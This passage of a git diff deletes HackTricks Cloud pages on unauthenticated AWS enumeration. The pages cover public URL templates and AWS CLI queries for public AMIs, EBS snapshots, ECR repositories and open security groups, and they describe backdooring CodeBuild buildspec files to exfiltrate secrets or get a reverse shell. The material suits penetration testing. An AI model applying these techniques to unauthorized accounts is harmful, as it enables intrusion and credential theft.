specific strings) can be included in there with the goal of **bypassing restrictions**. - -### Public URL template - -``` -https://{random_id}.execute-api.{region}.amazonaws.com/{user_provided} -``` - -### Get Account ID from public API Gateway URL - -Just like with S3 buckets, Data Exchange and Lambda URLs gateways, It's possible to find the account ID of an account abusing the **`aws:ResourceAccount`** **Policy Condition Key** from a public API Gateway URL. This is done by finding the account ID one character at a time abusing wildcards in the **`aws:ResourceAccount`** section of the policy.\ -This technique also allows to get **values of tags** if you know the tag key (there some default interesting ones). - -You can find more information in the [**original research**](https://blog.plerion.com/conditional-love-for-aws-metadata-enumeration/) and the tool [**conditional-love**](https://github.com/plerionhq/conditional-love/) to automate this exploitation. - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-cloudfront-unauthenticated-enum.md b/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-cloudfront-unauthenticated-enum.md deleted file mode 100644 index 8f553e9b7..000000000 --- a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-cloudfront-unauthenticated-enum.md +++ /dev/null @@ -1,37 +0,0 @@ -# AWS - Cloudfront Unauthenticated Enum - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -### Public URL template - -``` -https://{random_id}.cloudfront.net -``` - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-codebuild-unauthenticated-access.md b/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-codebuild-unauthenticated-access.md deleted file mode 100644 index 9d4227753..000000000 --- a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-codebuild-unauthenticated-access.md +++ /dev/null @@ -1,61 +0,0 @@ -# AWS - CodeBuild Unauthenticated Access - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## CodeBuild - -For more info check this page: - -{% content-ref url="../aws-services/aws-codebuild-enum.md" %} -[aws-codebuild-enum.md](../aws-services/aws-codebuild-enum.md) -{% endcontent-ref %} - -### buildspec.yml - -If you compromise write access over a repository containing a file named **`buildspec.yml`**, you could **backdoor** this file, which specifies the **commands that are going to be executed** inside a CodeBuild project and exfiltrate the secrets, compromise what is done and also compromise the **CodeBuild IAM role credentials**. - -Note that even if there isn't any **`buildspec.yml`** file but you know Codebuild is being used (or a different CI/CD) **modifying some legit code** that is going to be executed can also get you a reverse shell for example. - -For some related information you could check the page about how to attack Github Actions (similar to this): - -{% content-ref url="../../../pentesting-ci-cd/github-security/abusing-github-actions/" %} -[abusing-github-actions](../../../pentesting-ci-cd/github-security/abusing-github-actions/) -{% endcontent-ref %} - -## Self-hosted GitHub Actions runners in AWS CodeBuild - -As [**indicated in the docs**](https://docs.aws.amazon.com/codebuild/latest/userguide/action-runner.html), It's possible to configure **CodeBuild** to run **self-hosted Github actions** when a workflow is triggered inside a Github repo configured. This can be detected checking the CodeBuild project configuration because the **`Event type`** needs to contain: **`WORKFLOW_JOB_QUEUED`** and in a Github Workflow because it will select a **self-hosted** runner like this: - -```bash -runs-on: codebuild--${{ github.run_id }}-${{ github.run_attempt }} -``` - -This new relationship between Github Actions and AWS creates another way to compromise AWS from Github as the code in Github will be running in a CodeBuild project with an IAM role attached. - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-documentdb-enum.md b/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-documentdb-enum.md deleted file mode 100644 index 89c2f12cd..000000000 --- a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-documentdb-enum.md +++ /dev/null @@ -1,37 +0,0 @@ -# AWS - DocumentDB Unauthenticated Enum - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -### Public URL template - -``` -.cluster-..docdb.amazonaws.com -``` - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-dynamodb-unauthenticated-access.md b/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-dynamodb-unauthenticated-access.md deleted file mode 100644 index 8067c97b0..000000000 --- a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-dynamodb-unauthenticated-access.md +++ /dev/null @@ -1,41 +0,0 @@ -# AWS - DynamoDB Unauthenticated Access - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Dynamo DB - -For more information check: - -{% content-ref url="../aws-services/aws-dynamodb-enum.md" %} -[aws-dynamodb-enum.md](../aws-services/aws-dynamodb-enum.md) -{% endcontent-ref %} - -Apart from giving access to all AWS or some compromised external AWS account, or have some SQL injections in an application that communicates with DynamoDB I'm don't know more options to access AWS accounts from DynamoDB. - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ec2-unauthenticated-enum.md b/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ec2-unauthenticated-enum.md deleted file mode 100644 index ea692e888..000000000 --- a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ec2-unauthenticated-enum.md +++ /dev/null @@ -1,88 +0,0 @@ -# AWS - EC2 Unauthenticated Enum - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## EC2 & Related Services - -Check in this page more information about this: - -{% content-ref url="../aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/" %} -[aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum](../aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/) -{% endcontent-ref %} - -### Public Ports - -It's possible to expose the **any port of the virtual machines to the internet**. Depending on **what is running** in the exposed the port an attacker could abuse it. - -#### SSRF - -{% embed url="https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf" %} - -### Public AMIs & EBS Snapshots - -AWS allows to **give access to anyone to download AMIs and Snapshots**. You can list these resources very easily from your own account: - -{% code overflow="wrap" %} -```bash -# Public AMIs -aws ec2 describe-images --executable-users all - -## Search AMI by ownerID -aws ec2 describe-images --executable-users all --query 'Images[?contains(ImageLocation, `967541184254/`) == `true`]' - -## Search AMI by substr ("shared" in the example) -aws ec2 describe-images --executable-users all --query 'Images[?contains(ImageLocation, `shared`) == `true`]' - -# Public EBS snapshots (hard-drive copies) -aws ec2 describe-snapshots --restorable-by-user-ids all -aws ec2 describe-snapshots --restorable-by-user-ids all | jq '.Snapshots[] | select(.OwnerId == "099720109477")' -``` -{% endcode %} - -If you find a snapshot that is restorable by anyone, make sure to check [AWS - EBS Snapshot Dump](https://cloud.hacktricks.xyz/pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/aws-ebs-snapshot-dump) for directions on downloading and looting the snapshot. - -#### Public URL template - -```bash -# EC2 -ec2-{ip-seperated}.compute-1.amazonaws.com -# ELB -http://{user_provided}-{random_id}.{region}.elb.amazonaws.com:80/443 -https://{user_provided}-{random_id}.{region}.elb.amazonaws.com -``` - -### Enumerate EC2 instances with public IP - -{% code overflow="wrap" %} -```bash -aws ec2 describe-instances --query "Reservations[].Instances[?PublicIpAddress!=null].PublicIpAddress" --output text -``` -{% endcode %} - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ecr-unauthenticated-enum.md b/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ecr-unauthenticated-enum.md deleted file mode 100644 index 0e491c74e..000000000 --- a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ecr-unauthenticated-enum.md +++ /dev/null @@ -1,63 +0,0 @@ -# AWS - ECR Unauthenticated Enum - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## ECR - -For more information check: - -{% content-ref url="../aws-services/aws-ecr-enum.md" %} -[aws-ecr-enum.md](../aws-services/aws-ecr-enum.md) -{% endcontent-ref %} - -### Public registry repositories (images) - -As mentioned in the ECS Enum section, a public registry is **accessible by anyone** uses the format **`public.ecr.aws//`**. If a public repository URL is located by an attacker he could **download the image and search for sensitive information** in the metadata and content of the image. - -{% code overflow="wrap" %} -```bash -aws ecr describe-repositories --query 'repositories[?repositoryUriPublic == `true`].repositoryName' --output text -``` -{% endcode %} - -{% hint style="warning" %} -This could also happen in **private registries** where a registry policy or a repository policy is **granting access for example to `"AWS": "*"`**. Anyone with an AWS account could access that repo. -{% endhint %} - -### Enumerate Private Repo - -The tools [**skopeo**](https://github.com/containers/skopeo) and [**crane**](https://github.com/google/go-containerregistry/blob/main/cmd/crane/doc/crane.md) can be used to list accessible repositories inside a private registry. - -```bash -# Get image names -skopeo list-tags docker:// | grep -oP '(?<=^Name: ).+' -crane ls | sed 's/ .*//' -``` - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ecs-unauthenticated-enum.md b/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ecs-unauthenticated-enum.md deleted file mode 100644 index 1f9e1b97b..000000000 --- a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ecs-unauthenticated-enum.md +++ /dev/null @@ -1,53 +0,0 @@ -# AWS - ECS Unauthenticated Enum - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## ECS - -For more information check: - -{% content-ref url="../aws-services/aws-ecs-enum.md" %} -[aws-ecs-enum.md](../aws-services/aws-ecs-enum.md) -{% endcontent-ref %} - -### Publicly Accessible Security Group or Load Balancer for ECS Services - -A misconfigured security group that **allows inbound traffic from the internet (0.0.0.0/0 or ::/0)** to the Amazon ECS services could expose the AWS resources to attacks. - -{% code overflow="wrap" %} -```bash -# Example of detecting misconfigured security group for ECS services -aws ec2 describe-security-groups --query 'SecurityGroups[?IpPermissions[?contains(IpRanges[].CidrIp, `0.0.0.0/0`) || contains(Ipv6Ranges[].CidrIpv6, `::/0`)]]' - -# Example of detecting a publicly accessible load balancer for ECS services -aws elbv2 describe-load-balancers --query 'LoadBalancers[?Scheme == `internet-facing`]' -``` -{% endcode %} - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-elastic-beanstalk-unauthenticated-enum.md b/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-elastic-beanstalk-unauthenticated-enum.md deleted file mode 100644 index 8ea519bad..000000000 --- a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-elastic-beanstalk-unauthenticated-enum.md +++ /dev/null @@ -1,65 +0,0 @@ -# AWS - Elastic Beanstalk Unauthenticated Enum - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Elastic Beanstalk - -For more information check: - -{% content-ref url="../aws-services/aws-elastic-beanstalk-enum.md" %} -[aws-elastic-beanstalk-enum.md](../aws-services/aws-elastic-beanstalk-enum.md) -{% endcontent-ref %} - -### Web vulnerability - -Note that by default Beanstalk environments have the **Metadatav1 disabled**. - -The format of the Beanstalk web pages is **`https://-env..elasticbeanstalk.com/`** - -### Insecure Security Group Rules - -Misconfigured security group rules can expose Elastic Beanstalk instances to the public. **Overly permissive ingress rules, such as allowing traffic from any IP address (0.0.0.0/0) on sensitive ports, can enable attackers to access the instance**. - -### Publicly Accessible Load Balancer - -If an Elastic Beanstalk environment uses a load balancer and the load balancer is configured to be publicly accessible, attackers can **send requests directly to the load balancer**. While this might not be an issue for web applications intended to be publicly accessible, it could be a problem for private applications or environments. - -### Publicly Accessible S3 Buckets - -Elastic Beanstalk applications are often stored in S3 buckets before deployment. If the S3 bucket containing the application is publicly accessible, an attacker could **download the application code and search for vulnerabilities or sensitive information**. - -### Enumerate Public Environments - -{% code overflow="wrap" %} -```bash -aws elasticbeanstalk describe-environments --query 'Environments[?OptionSettings[?OptionName==`aws:elbv2:listener:80:defaultProcess` && contains(OptionValue, `redirect`)]].{EnvironmentName:EnvironmentName, ApplicationName:ApplicationName, Status:Status}' --output table -``` -{% endcode %} - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-elasticsearch-unauthenticated-enum.md b/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-elasticsearch-unauthenticated-enum.md deleted file mode 100644 index 0e6f5efc9..000000000 --- a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-elasticsearch-unauthenticated-enum.md +++ /dev/null @@ -1,38 +0,0 @@ -# AWS - Elasticsearch Unauthenticated Enum - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -### Public URL template - -``` -https://vpc-{user_provided}-[random].[region].es.amazonaws.com -https://search-{user_provided}-[random].[region].es.amazonaws.com -``` - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-iot-unauthenticated-enum.md b/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-iot-unauthenticated-enum.md deleted file mode 100644 index 6cb420ff7..000000000 --- a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-iot-unauthenticated-enum.md +++ /dev/null @@ -1,39 +0,0 @@ -# AWS - IoT Unauthenticated Enum - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -### Public URL template - -``` -mqtt://{random_id}.iot.{region}.amazonaws.com:8883 -https://{random_id}.iot.{region}.amazonaws.com:8443 -https://{random_id}.iot.{region}.amazonaws.com:443 -``` - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-kinesis-video-unauthenticated-enum.md b/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-kinesis-video-unauthenticated-enum.md deleted file mode 100644 index 0ea3e2d46..000000000 --- a/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-kinesis-video-unauthenticated-enum.md +++ /dev/null @@ -1,37 +0,0 @@ -# AWS - Kinesis Video Unauthenticated Enum - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
